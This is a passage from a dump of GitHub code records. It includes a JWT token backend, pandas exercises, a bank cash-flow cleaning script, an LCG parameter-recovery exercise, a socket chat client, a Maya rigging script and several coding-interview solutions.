.utils import format_lazy\n\n\nALLOWED_ALGORITHMS = (\n 'HS256',\n)\n\n\nclass TokenBackend(object):\n def __init__(self, secret, algorithm):\n if algorithm not in ALLOWED_ALGORITHMS:\n raise TokenBackendError(format_lazy(_(\"Unrecognized algorithm type '{}'\"), algorithm))\n\n self.secret = secret\n self.algorithm = algorithm\n\n def encode(self, payload):\n \"\"\"\n Returns an encoded token for the given payload dictionary.\n \"\"\"\n raise NotImplementedError # pragma: no cover\n\n def decode(self, token):\n \"\"\"\n Performs a low-level validation of the given base64 encoded token and\n returns its payload dictionary.\n\n Raises a `TokenBackendError` if the token is malformed or if its\n signature check fails.\n \"\"\"\n raise NotImplementedError # pragma: no cover\n\n\nclass PythonJOSEBackend(TokenBackend):\n def __init__(self, *args, **kwargs):\n super(PythonJOSEBackend, self).__init__(*args, **kwargs)\n\n from jose import jwt\n from jose.exceptions import JOSEError\n\n self.jwt = jwt\n self.JOSEError = JOSEError\n\n def encode(self, payload):\n \"\"\"\n Returns an encoded token for the given payload dictionary.\n \"\"\"\n return self.jwt.encode(payload, self.secret, algorithm=self.algorithm)\n\n def decode(self, token):\n \"\"\"\n Performs a low-level validation of the given token and returns its\n payload dictionary.\n\n Raises a `TokenBackendError` if the token is malformed, if its\n signature check fails, or if its 'exp' claim indicates it has expired.\n \"\"\"\n try:\n return self.jwt.decode(token, self.secret, algorithms=[self.algorithm])\n except self.JOSEError:\n raise TokenBackendError(_('Token is invalid or expired'))\n","repo_name":"lucieneferri/bookstore","sub_path":"venv/lib/python3.8/site-packages/rest_framework_simplejwt/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5896823497","text":"import pandas as pd\nimport numpy as np\n\nfrom datetime import datetime\n\n\ndates = pd.date_range(datetime.now().date(), periods=8)\ndf = pd.DataFrame(np.random.randn(8, 4), columns=['A', 'B', 'C', 'D']) # index=dates\ndf['Dates'] = dates\n\nmountain_head = pd.Series(\n [2061, 2035.8, 2028.5, 2022.5, 2016.4],\n index=['Goverla', 'Brebenskyl', 'Pip_Ivan', 'Petros', 'Gutin_Tomnatik'],\n name='Height, m',\n dtype=float\n)\n\ncontacts = pd.DataFrame(\n {\n 'name': [\n 'Allen Raymond',\n 'Chaim Lewis',\n 'Kennedy Lane',\n 'Wylie Pope',\n 'Cyrus Jackson'\n ],\n 'email': [\n 'allen@mail.com',\n 'chaim@mail.com',\n 'kennedy@mail.comn',\n 'wylie@mail.com',\n 'cyrus@mail.com'\n ],\n 'phone': [\n '(992) 914-1234',\n '(345) 234-4567',\n '(233) 123-9900',\n '(678) 233-0988',\n '(653) 111-5690'\n ],\n 'favorite': [\n False,\n False,\n True,\n False,\n True\n ]\n },\n index=[1, 2, 3, 4, 5]\n)\n\n# print(mountain_head.sort_values(ascending=False))\n# contacts['phone'][2] = '(555) 666-8899'\n# contacts.__getitem__('phone').__setitem__([2], '(555) 666-7788')\n# print(contacts['phone'])\n\ntmp = pd.read_html(io='https://www.statisticstimes.com/tech/top-computer-languages.php',\n attrs={'id': 'table_id1'},\n index_col='Jun 2022')\n# tmp[0]['Change'][1] = '100'\ntmp[0]['nums'] = [i for i in range(1, len(tmp[0]) + 1)]\n\n# tmp[0].append(pd.Series(['Jun 2022', 'Change', 'Programming language', 'Share', 'Trends'],\n# [29, 'Yes', 'Python2', '30%', '+2.5%']),\n# ignore_index=True)\n# tmp[0] = pd.concat([tmp[0], pd.DataFrame.from_records([{'Change': 'Yes',\n# 'Programming language': 'Python',\n# 'Share': '30%',\n# 'Trends': '+2.5%'\n# }])])\n#\n# tmp[0].drop(['Change'], axis=1, inplace=True)\n# print(tmp[0].dropna())\n# print(tmp[0].fillna(0.0))\n# print(tmp[0].replace('↑↑↑', 1.0))\n# print(tmp[0].drop_duplicates('Change'))\n\ndate = pd.date_range(start=datetime.now().date(), periods=7)\ndate_view = pd.Series(\n [i for i in range(len(date))],\n index=pd.date_range(start=datetime.now().date(), periods=7).sort_values(ascending=False)\n)\nprint(tmp[0])\n","repo_name":"Ivan-Grigorev/Data_Analysis_trainee","sub_path":"main_pd.py","file_name":"main_pd.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70467282161","text":"import pandas as pd\n\nreader = pd.read_csv('data/servicelogs', iterator=True)\ntry:\n df = reader.get_chunk(100000000)\nexcept StopIteration:\n print(\"Iteration is stopped.\")\n\nloop = True\nchunkSize = 100000\nchunks = []\nwhile loop:\n try:\n chunk = reader.get_chunk(chunkSize)\n chunks.append(chunk)\n except StopIteration:\n loop = False\n print(\"Iteration is stopped.\")\ndf = pd.concat(chunks, ignore_index=True)\n\n\n\"\"\"\n使用不同分块大小来读取再调用 pandas.concat 连接DataFrame,将chunkSize设置在1000万条左右。\n\"\"\"","repo_name":"kingreatwill/penter","sub_path":"pandas/big_file.py","file_name":"big_file.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"27049692300","text":"# Description\n# 中文\n# English\n# Given an array of integers, find a contiguous subarray which has the largest sum.\n\n# The subarray should contain at least one number.\n\n# Have you met this question in a real interview? \n# Example\n# Example1:\n\n# Input: [−2,2,−3,4,−1,2,1,−5,3]\n# Output: 6\n# Explanation: the contiguous subarray [4,−1,2,1] has the largest sum = 6.\n# Example2:\n\n# Input: [1,2,3,4]\n# Output: 10\n# Explanation: the contiguous subarray [1,2,3,4] has the largest sum = 10.\n\nclass Solution:\n \"\"\"\n @param nums: A list of integers\n @return: A integer indicate the sum of max subarray\n \"\"\"\n def maxSubArray(self, nums):\n # write your code here\n now_sum, min_sum, max_sum = 0, 0, -sys.maxsize\n for num in nums:\n now_sum += num\n max_sum = max(max_sum, now_sum - min_sum)\n min_sum = min(min_sum, now_sum)\n return max_sum","repo_name":"runzezhang/Code-NoteBook","sub_path":"lintcode/0041-maximum-subarray.py","file_name":"0041-maximum-subarray.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28831023754","text":"import json, datetime, pprint, traceback\n\nimport discord\nfrom discord.ext import commands\n\nfrom common import *\nfrom database import *\nfrom VakLogger import *\n\n\n#The cog itself\n\nclass Logger(commands.Cog):\n\t\"\"\" A cog that allows its client bot to watch member statuses \"\"\"\n\t\n\tdef __init__(self, client):\n\t\tself.client = client\n\t\t\n\t\t \n\t@commands.Cog.listener()\n\tasync def on_command_error(self, ctx, error):\n\t\t\t\n\t\t#error is an error built into discord.py, so analyze the original error\n\t\tif (isinstance(error, commands.errors.CommandInvokeError)):\n\t\t\tlogInfo(\"CommandInvokeError raised\")\n\t\t\terror = error.original\n\n\t\tif (ctx.guild):\n\t\t\tserverID = ctx.guild.id\n\t\telse:\n\t\t\tserverID = None\n\n\t\tauthorID = ctx.author.id\n\n\t\t#Respond to error\n\t\t#If the error is that permissions are missing, very little info needs to be logged\n\t\tif (isinstance(error, commands.errors.MissingPermissions)):\n\t\t\tawait ctx.send(str(error))\n\t\t\tlogInfo(str(error), {\"Server\": serverID, \"Author\": authorID})\n\t\t\treturn\n\n\t\t#Something unforseen happened, so document to the maximum\n\t\telse:\n\t\t\terrorData = logError(error, {\"Server\": serverID, \"Author\": authorID})\n\n\t\t\tawait ctx.send(f\"[{errorData['Error Time']}] The following error has occurred and been logged: \\\"{str(error)}\\\"\")\n\n\t\tlogInfo(f\"Error has been handled successfully!\\n\")\n\n\t@commands.command()\n\tasync def error(self, ctx, **args):\n\t\tawait ctx.send(\"Testing error logging...\")\n\t\traise Exception(\"Testing error logging!\")\n\t\t\nasync def setup(client):\n\tawait client.add_cog(Logger(client))","repo_name":"AnuraagGodavari/Lil-Buddy","sub_path":"Lil-Buddy/Cogs/errorhandler.py","file_name":"errorhandler.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38257130831","text":"import os\nimport pandas as pd\nimport numpy as np\nimport math\n\n#ODO correction\ndef odometers_gb(path=\"\", filename=\"\"):\n #dawnload / cleam / prepare df from dir\n #df = pd.read_excel(os.path.join(path,filename), skiprows=6)\n df = pd.read_excel(os.path.join(path,filename)) # na potrzeby przerobienia danych z WO\n df.loc[:,\"ODOMETER_FW\"] = df.loc[:,\"ODOMETER_FW\"].fillna(0).astype('int')\n df.dropna(inplace = True)\n df.sort_values(by=['VEHICLE_ID_FW','TRANSACTION_DATE_FW','TRANSACTION_TIME_FW'], ascending=[True,False,False],inplace=True)\n df['ODOMETER_FW'] = df['ODOMETER_FW'].apply(lambda x: 0 if x <1000 else x)\n df.set_index(['VEHICLE_ID_FW'], inplace=True)\n\n #create of unique Vehicle IDs list\n ids = df.index.unique().tolist()\n #create new df to store corrected data from dawnloaded df\n df_corrected = pd.DataFrame()\n\n #odo correction and storing data in df_corrected\n for i in ids:\n temp_df = df.loc[i]\n odo = df.loc[i,\"ODOMETER_FW\"].tolist()\n \n if type(odo) == list:\n odo.sort(reverse=True)\n \n for j in range(len(odo)-1):\n if abs(odo[j] - odo[j+1]) > 9999 or odo[j] - odo[j+1] < 0:\n odo[j+1] = 0\n \n temp_df.loc[:,\"ODOMETER_FW\"] = odo #temp_df[\"ODOMETER_FW\"] = odo\n df_corrected = df_corrected.append(temp_df)\n \n else:\n df_corrected = df_corrected.append(temp_df)\n \n df_corrected.reset_index(inplace=True)\n df_corrected.rename(columns = {'index':'VEHICLE_ID_FW'}, inplace = True)\n\n return df_corrected\n\nif __name__ == '__main__':\n odometers_gb()","repo_name":"Wiktor90/PANDAS-App","sub_path":"gb_odo.py","file_name":"gb_odo.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29016208801","text":"import math\nfrom functools import reduce\n\n\nclass LCG:\n def __init__(self, seed, a, c, m):\n self.last_number = seed\n self.a = a\n self.c = c\n self.m = m\n\n def get_next_int(self):\n self.last_number = (self.last_number * self.a + self.c) % self.m\n return self.last_number\n\n\ndef try_to_find_unknown_m(numbers):\n diffs = [s1 - s0 for s0, s1 in zip(numbers, numbers[1:])]\n zeroes = [t2 * t0 - t1 * t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])]\n return abs(reduce(math.gcd, zeroes))\n\n\ndef try_to_retrieve_lcg_parameters(generator):\n random_numbers = list()\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n m = try_to_find_unknown_m(random_numbers)\n a = find_unknown_a(random_numbers, m)\n c = find_unknown_c(random_numbers, a, m)\n return a, c, m\n\n\ndef find_next_number(numbers, a, c, m):\n assert len(numbers) >= 1\n return (numbers[len(numbers) - 1] * a + c) % m\n\n\ndef find_unknown_c(numbers, a, m):\n assert len(numbers) >= 3\n return (numbers[2] - (a * numbers[1])) % m\n\n\ndef find_inverse_for_x_in_m_ring(x, m):\n d, _, y = egcd(m, x)\n assert d == 1\n return y\n\n\ndef egcd(a, b):\n if b == 0:\n return a, 1, 0\n else:\n d, x, y = egcd(b, a % b)\n d, x, y = d, y, x - (math.floor(a / b) * y)\n return d, x, y\n\n\ndef find_unknown_a(numbers, m):\n assert len(numbers) >= 4\n divider = (numbers[0] - numbers[1])\n divider_inverse = find_inverse_for_x_in_m_ring(divider, m)\n return ((numbers[1] - numbers[2]) * divider_inverse) % m\n\n\ndef predict_next_lgc_value(last, a, c, m):\n return (last * a + c) % m\n\n\n# returns true if given generator is an instance of LGC\ndef recognize_lgc(generator):\n for i in range(1, 1000):\n try:\n a, c, m = try_to_retrieve_lcg_parameters(generator)\n generated_num = generator.get_next_int()\n for j in range(1, 20):\n predicted_num = predict_next_lgc_value(generated_num, a, c, m)\n generated_num = generator.get_next_int()\n assert (generated_num == predicted_num)\n\n return True\n except AssertionError:\n pass\n return False\n","repo_name":"GorskiBartosz/Cracking_Pseudo_Random_Generators","sub_path":"lcg.py","file_name":"lcg.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40816396914","text":"from bert_serving.client import BertClient\nimport csv\nimport json\n\n\ndef sample_pooling(vec):\n new_vec = []\n for i in range(128):\n new_vec.append(sum(vec[i*8:i*8+7]))\n return new_vec\n\nfile_path = './data/decagon_data/'\n\nbc = BertClient()\nSE_set = set()\nwith open(file_path + 'bio-decagon-combo.csv') as csv_file:\n sreader = csv.reader(csv_file, delimiter=',')\n next(sreader, None)\n for line in sreader:\n SE_set.add(line[3])\n\nse_emb = dict()\nfor se in SE_set:\n # print(len(bc.encode([se])[0]))\n se_emb[se] = sample_pooling(bc.encode([se])[0])\n\n\nwith open(file_path+'se_embedding.json', 'w') as outfile:\n json.dump(se_emb,outfile,ensure_ascii=False)\n outfile.write('\\n')\n\n","repo_name":"Hanchen-Wang/GoGNN","sub_path":"SE_preprocess.py","file_name":"SE_preprocess.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"72765806642","text":"import pandas as pd\nimport handle_csv\nfrom handle_csv import utility\nfrom os.path import join, dirname\n\n\ndef comb_and_field_standardize(raw_cf_folder_dir, field_map_dir):\n # 抓取 每个流水表的 文件路径。\n filesdir = utility.get_filesdir_under_a_folder(raw_cf_folder_dir, '.csv', '.xlsx', '.xls')\n\n for raw_cf_dir in filesdir:\n # 如流水原文件,是excel格式,则处理转换为csv格式,并返回转换得文件的路径。如非excel格式,返回原路径。\n convert_cf_directory = utility.convert_excel_to_csv(raw_cf_dir)\n\n # 加载单个流水CSV文件。\n raw_cf_csv = handle_csv.CashFlowHandler(convert_cf_directory)\n\n # 加载原始流水表段标准化的映射表。\n raw_cf_csv.do_field_standardize(field_map_dir)\n\n # 将结果写入csv文件。\n raw_cf_csv.write_csvfile(directory=raw_cf_dir, lines=raw_cf_csv.field_std_lines, combine=True, crefloder=True)\n\n return raw_cf_csv.writen_directory\n\n\ndef data_standardize(directory):\n def datetime_data_standardize(dataframe):\n \"\"\"1.汇总<交易日期时间>、<交易日期>、<交易时间>字段的不完整时间信息,重填补全<交易日期时间>。后删除<交易日期>、<交易时间>字段。\n 2.<交易日期时间>字段,字符串日期化。\"\"\"\n df = dataframe.copy()\n total_rows = len(df.index)\n datetime = list(df[\"交易日期时间\"])\n date = list(df[\"交易日期\"].astype(str))\n time = list(df[\"交易时间\"].astype(str))\n datetime_clean = []\n bad_lines = []\n\n for i in range(total_rows):\n if not pd.isnull(datetime[i]):\n _datetime = datetime[i]\n else:\n _date = date[i] if not date[i] == 'nan' else ''\n _time = time[i] if not time[i] == 'nan' else ''\n _time = (6 - len(_time)) * '0' + _time\n _datetime = _date + ' ' + _time\n # 日期格式明显不对的(不以2开头),是badlines。目前仅适用于去掉交行的表尾行。\n if not utility.is_date(_datetime):\n bad_lines.append(i)\n else:\n datetime_clean.append(_datetime)\n df = df[~df.index.isin(bad_lines)]\n df.loc[:, \"交易日期时间\"] = datetime_clean\n df.loc[:, \"交易日期时间\"] = pd.to_datetime(df[\"交易日期时间\"])\n df.drop([\"交易日期\", \"交易时间\"], axis=1, inplace=True)\n\n return df\n\n def amount_to_numeric(dataframe):\n df = dataframe.copy()\n # 1.<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>、<余额>字段,字符串数字化。\n df.loc[:, \"借方发生额\"] = pd.to_numeric(df[\"借方发生额\"])\n df.loc[:, \"贷方发生额\"] = pd.to_numeric(df[\"贷方发生额\"])\n df.loc[:, \"收支额正负值\"] = pd.to_numeric(df[\"收支额正负值\"])\n df.loc[:, \"收支额绝对值\"] = pd.to_numeric(df[\"收支额绝对值\"])\n df.loc[:, \"余额\"] = pd.to_numeric(df[\"余额\"])\n\n return df\n\n def amount_data_standardize(dataframe):\n \"\"\"1.<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>、<余额>字段,字符串数字化。\n 2.汇总<收支方向>、<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>字段的不完整时间信息,重填补全各字段。\"\"\"\n df = dataframe.copy()\n total_rows = len(df.index)\n # # 1.<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>、<余额>字段,字符串数字化。\n df.loc[:, \"借方发生额\"] = pd.to_numeric(df[\"借方发生额\"], errors='coerce')\n df.loc[:, \"贷方发生额\"] = pd.to_numeric(df[\"贷方发生额\"], errors='coerce')\n df.loc[:, \"收支额正负值\"] = pd.to_numeric(df[\"收支额正负值\"], errors='coerce')\n df.loc[:, \"收支额绝对值\"] = pd.to_numeric(df[\"收支额绝对值\"], errors='coerce')\n df.loc[:, \"余额\"] = pd.to_numeric(df[\"余额\"], errors='coerce')\n\n # 2.汇总<收支方向>、<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>字段的不完整时间信息,重填补全各字段。\n sign = list(df[\"收支方向\"])\n debit = list(df[\"借方发生额\"])\n credit = list(df[\"贷方发生额\"])\n net_amount = list(df[\"收支额正负值\"])\n abs_amount = list(df[\"收支额绝对值\"])\n sign_clean = []\n debit_clean = []\n credit_clean = []\n net_amount_clean = []\n\n for i in range(total_rows):\n if not pd.isnull(sign[i]):\n if sign[i] in ['来账','收入']:\n _sign = '贷'\n elif sign[i] in ['往账','支出']:\n _sign = '借'\n else:\n _sign = sign[i]\n else:\n if (not pd.isnull(debit[i])) and (debit[i] != 0):\n _sign = '借'\n elif (not pd.isnull(credit[i])) and (credit[i] != 0):\n _sign = '贷'\n elif net_amount[i] < 0:\n _sign = '借'\n else:\n _sign = '贷'\n sign_clean.append(_sign)\n for i in range(total_rows):\n if not pd.isnull(net_amount[i]):\n _net_amount = net_amount[i]\n else:\n if (not pd.isnull(debit[i])) and (debit[i] != 0):\n _net_amount = - debit[i]\n elif (not pd.isnull(credit[i])) and (credit[i] != 0):\n _net_amount = credit[i]\n elif not pd.isnull(abs_amount[i]):\n _net_amount = (-1 if sign_clean[i] == '借' else 1) * abs_amount[i]\n # 支付宝流水出现过借、贷方都为0的,为开户第1笔流水。\n elif (debit[i] == 0) and credit[i] == 0:\n _net_amount = 0\n else:\n print (df.iloc[[i-1]])\n raise ValueError(f\"第{i}行,net_amount无法按逻辑计算得到,请检查!\")\n net_amount_clean.append(_net_amount)\n for i in range(total_rows):\n if (not pd.isnull(debit[i])) or (not pd.isnull(credit[i])):\n _debit = debit[i] if (not pd.isnull(debit[i])) else 0\n _credit = credit[i] if (not pd.isnull(credit[i])) else 0\n else:\n _debit = - net_amount_clean[i] if sign_clean[i] == '借' else 0\n _credit = net_amount_clean[i] if sign_clean[i] == '贷' else 0\n debit_clean.append(_debit)\n credit_clean.append(_credit)\n abs_amount_clean = [abs(i) for i in net_amount_clean]\n df.loc[:, \"收支方向\"] = sign_clean\n df.loc[:, \"借方发生额\"] = debit_clean\n df.loc[:, \"贷方发生额\"] = credit_clean\n df.loc[:, \"收支额正负值\"] = net_amount_clean\n df.loc[:, \"收支额绝对值\"] = abs_amount_clean\n\n return df\n\n def counterpart_data_standardize(dataframe):\n \"\"\"1.汇总<付款人名称>、<付款人账号>、<收款人账号>、<收款人名称>,补全<对方账号>、<对方账户名称>字段。\n 后删除<付款人名称>、<付款人账号>、<收款人账号>、<收款人名称>字段。\"\"\"\n df = dataframe.copy()\n total_rows = len(df.index)\n payer = list(df[\"付款人名称\"])\n payer_acc = list(df[\"付款人账号\"])\n payee = list(df[\"收款人名称\"])\n payee_acc = list(df[\"收款人账号\"])\n counterpart = list(df[\"对方账户名称\"])\n counterpart_acc = list(df[\"对方账号\"])\n sign = list(df[\"收支方向\"])\n counterpart_clean = []\n counterpart_acc_clean = []\n\n for i in range(total_rows):\n if not pd.isnull(payer[i]) and sign[i] == '贷':\n _counterpart = payer[i]\n _counterpart_acc = payer_acc[i]\n elif not pd.isnull(payee[i]) and sign[i] == '借':\n _counterpart = payee[i]\n _counterpart_acc = payee_acc[i]\n else:\n _counterpart = counterpart[i]\n _counterpart_acc = counterpart_acc[i]\n counterpart_clean.append(_counterpart)\n counterpart_acc_clean.append(_counterpart_acc)\n\n df.loc[:, \"对方账户名称\"] = counterpart_clean\n df.loc[:, \"对方账号\"] = counterpart_acc_clean\n df.drop([\"付款人名称\", \"付款人账号\", \"收款人账号\", \"收款人名称\"], axis=1, inplace=True)\n\n return df\n\n def create_sn(dataframe):\n \"\"\"1.将<交易时间日期>字段转换为yyyymmdd格式的字符串,字段。\n 基于<本方账号>、分组,求每行的组内累计序号,字段。\n 以<本方账号>__的格式,生成字段。并挪至首列。\n 后删除字段。\"\"\"\n df = dataframe.copy()\n df['本方账号'] = df['本方账号'].astype(str)\n df['yyyymmdd'] = df[\"交易日期时间\"].dt.strftime('%Y%m%d')\n df['cumcount'] = df.groupby(['本方账号', 'yyyymmdd']).cumcount() + 1\n df['cumcount'] = df['cumcount'].astype(str)\n\n df['sn'] = df[['本方账号', 'yyyymmdd', 'cumcount']].agg(\"_\".join, axis=1)\n temp_cols = df.columns.tolist()\n new_cols = temp_cols[-1:] + temp_cols[:-1]\n df = df[new_cols]\n\n df.drop([\"yyyymmdd\", \"cumcount\"], axis=1, inplace=True)\n\n return df\n\n def sort_within_each_acc(dataframe):\n \"\"\"各账号的流水,有正向顺序的(月初->月末),也有逆向顺序的(月末—>月初)。\n 1.本函数判定各账号是否正序。判定条件:第2行发生额+第1行余额-第2行余额,是否为0。\n 2.本函数依据判定结果,重新排序各账号流水的顺序。\"\"\"\n df = dataframe.copy()\n df_sorted = pd.DataFrame()\n acc_set = df['本方账号'].unique()\n for acc in acc_set:\n ascending = True\n df_acc = df.loc[df['本方账号'] == acc].copy()\n if df_acc.shape[0] > 1:\n bal_1st_line = df_acc.iloc[0].loc['余额']\n bal_2nd_line = df_acc.iloc[1].loc['余额']\n net_amount_2nd_line = df_acc.iloc[1].loc['收支额正负值']\n diff_abs = abs(bal_1st_line + net_amount_2nd_line - bal_2nd_line)\n if diff_abs < 0.001:\n pass\n else:\n ascending = False\n else:\n pass\n\n df_acc.sort_index(ascending=ascending, inplace=True)\n df_acc.reset_index(drop=True, inplace=True)\n df_sorted = pd.concat([df_sorted.copy(), df_acc], axis=0)\n\n return df_sorted\n\n def fix_debit_negative(dataframe):\n df = dataframe.copy()\n acc_set = df['本方账号'].unique()\n for acc in acc_set:\n debit = df.loc[df['本方账号'] == acc, \"借方发生额\"]\n debit = pd.to_numeric(debit, errors='coerce')\n try: \n if max(debit) <= 0:\n df.loc[df['本方账号'] == acc, \"借方发生额\"] = -debit\n else:\n pass\n except TypeError:\n print(\"acc:\", acc)\n print(\"debit\", debit)\n def typeof(x):\n return type(x)\n debit_type = debit.apply(typeof)\n print(\"debit\", debit_type)\n raise\n return df\n\n def sub_main(_directory):\n # 前步骤已得到字段统一的流水文件。用pandas读取该文件。\n df = pd.read_csv(_directory, dtype={\"本方账号\": str, \"对方账号\": str, \"付款人账号\": str, \"收款人账号\": str, \"流水号\": str, })\n # 执行数值标准化,分如下步骤。步骤顺序不可改动,后步骤默认使用前步骤的清理结果。\n # 数值标准化_第一步:日期时间。\n df = datetime_data_standardize(df)\n #df = amount_to_numeric(df)\n # 数值标准化_第二步:借方发生额恒为负的账号,改为正。\n df = fix_debit_negative(df)\n # 数值标准化_第三步:收支方向、收支金额。\n df = amount_data_standardize(df)\n # 数值标准化_第四步:对方名称、对方账号。\n df = counterpart_data_standardize(df)\n # 数值标准化_第五步:对倒序的账号的流水按正序重排。\n df = sort_within_each_acc(df)\n # 创建流水sn,格式<本方账号_yyyymmdd_组内累计序号>。\n df = create_sn(df)\n # 清理任务结束。将清理后的结果,写入csv文件。\n output_dir = join(dirname(_directory),'output_cleaned.csv')\n df.to_csv(output_dir, mode='w', index=False, encoding='utf-8-sig')\n print(\"字段数值计算和数值格式统一后的合并银行流水:\", output_dir)\n\n sub_main(directory)\n\n\ndef main():\n while True:\n raw_cf_folder_dir = input(\"请录入流水所在文件夹的路径:\")\n if raw_cf_folder_dir != \"\":\n break\n while True:\n field_map_dir = input(\"请录入流水字段映射表的路径:\")\n if field_map_dir != \"\":\n break\n field_std_cf_dir = comb_and_field_standardize(raw_cf_folder_dir, field_map_dir)\n data_standardize(field_std_cf_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zhuyizhang/cashflow_standardize","sub_path":"cash_flow_stdize.py","file_name":"cash_flow_stdize.py","file_ext":"py","file_size_in_byte":13644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17441668659","text":"#!C:/Python36/python.exe\r\n\r\nimport socket\r\n \r\ndef Main():\r\n # in case of muliple devices connected over same network change loacalhost to ip of the network\r\n host = 'localhost'\r\n port = 80\r\n \r\n mySocket = socket.socket()\r\n mySocket.connect((host,port))\r\n \r\n message = input(\" -> \")\r\n \r\n while message != 'q':\r\n mySocket.send(message.encode())\r\n data = mySocket.recv(1024).decode()\r\n \r\n print ('Received from server: ' + data)\r\n \r\n message = input(\" -> \")\r\n \r\n mySocket.close()\r\n \r\nif __name__ == '__main__':\r\n Main()\r\n","repo_name":"gautamgupta1811/chatapp","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39615475853","text":"def number_length(int):\n '''You have a positive integer. Try to find out how many digits it has?\n\nInput: A positive Int\n\nOutput: An Int.'''\n\n num = len(str(int))\n return num\n\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(number_length(1009))\n","repo_name":"fernandaveiga/checkIO_solutions","sub_path":"INICIATION/number_length.py","file_name":"number_length.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26021832691","text":"import maya.cmds as cmds\nimport zbw_rig as rig\n\n\"\"\"\ncreates an fk control chain on selected joints (in order). select control reference object (to be copied) and then object to receive controls, then run. \n\"\"\"\n\n#get ctrl\nctrl = cmds.ls(sl=True)[0]\n\n#get each jnt\njnts = cmds.ls(sl=True)[1:]\ngrps= []\ncldrn = []\n#grp orient ctrl for each jnt\n#get jnt name\nfor jnt in jnts:\n \n #duplicate control and rename, then group orient\n thisCtrl = cmds.duplicate(ctrl, name=jnt.rstrip(\"_JNT\") + \"_CTRL\")[0]\n \n thisGrp = cmds.group(n=thisCtrl+ \"_GRP\", em=True)\n cmds.parent(thisCtrl, thisGrp)\n \n trans = cmds.xform(jnt, q=True, ws = True, rp = True)\n rot = cmds.xform(jnt, q=True, ws = True, ro=True)\n \n #cmds.xform(thisGrp,ws=True, s = (1,-1,0))\n cmds.xform(thisGrp, ws=True, t = trans)\n cmds.xform(thisGrp, ws=True, ro = rot)\n cmds.parentConstraint(thisCtrl, jnt, mo=True)\n \n grps.append(thisGrp)\n cldrn.append(thisCtrl)\n \nfor x in range(len(grps)-1, 0, -1):\n cmds.parent(grps[x], cldrn[x-1])\n #print x, x-1\n \n\n ","repo_name":"zethwillie/python_wip","sub_path":"fkChainMaker.py","file_name":"fkChainMaker.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32154707127","text":"# linked list cycle\n# Write a function, linked_list_cycle, that takes in the head of a linked list as an argument. The function should return a boolean indicating whether or not the linked list contains a cycle.\n\n\n# My solution:\ndef linked_list_cycle(head):\n if head == None:\n return False\n slow, fast = head, head.next\n \n while fast and fast.next:\n if slow == fast or fast.next == slow:\n return True\n slow = slow.next\n fast = fast.next.next\n return False\n\n# Alvin's solution:\ndef linked_list_cycle(head):\n first_iteration = True\n \n fast = head\n slow = head\n while fast is not None and fast.next is not None:\n if slow is fast and not first_iteration:\n return True\n first_iteration = False\n slow = slow.next\n fast = fast.next.next\n \n return False\n","repo_name":"Dhaaaf/Leetcoding","sub_path":"structy/mixedrecall/3.linkedListCycle.py","file_name":"3.linkedListCycle.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30386029435","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Jun 07 20:05:48 2022\n\n@author: Jerome Yutai Shen\n\n\"\"\"\nfrom common_classes import ListNode\n\nclass Solution:\n def addTwoNumbers(self, l1, l2) -> ListNode:\n dummy = ListNode(None)\n tail = dummy\n carry = 0\n while l1 or l2: # or carry:\n\n if l1:\n carry += l1.val\n l1 = l1.next\n if l2:\n carry += l2.val\n l2 = l2.next\n\n digit, carry = carry % 10, carry // 10\n node = ListNode(digit)\n tail.next, tail = node, node\n\n return dummy.next\n\n \"\"\" \"\"\"\n\n\nclass Solution2:\n def addTwoNumbers(self, l1, l2) -> ListNode:\n s1, s2 = 0, 0\n while l1:\n s1 = s1 * 10 + l1.val\n l1 = l1.next\n while l2:\n s2 = s2 * 10 + l2.val\n l2 = l2.next\n res = s1 + s2\n dummy = ListNode(0)\n head = dummy\n string = str(res)[::-1]\n for k in range(len(string)):\n tmp = string[k]\n dummy.next = ListNode(int(tmp))\n dummy = dummy.next\n return 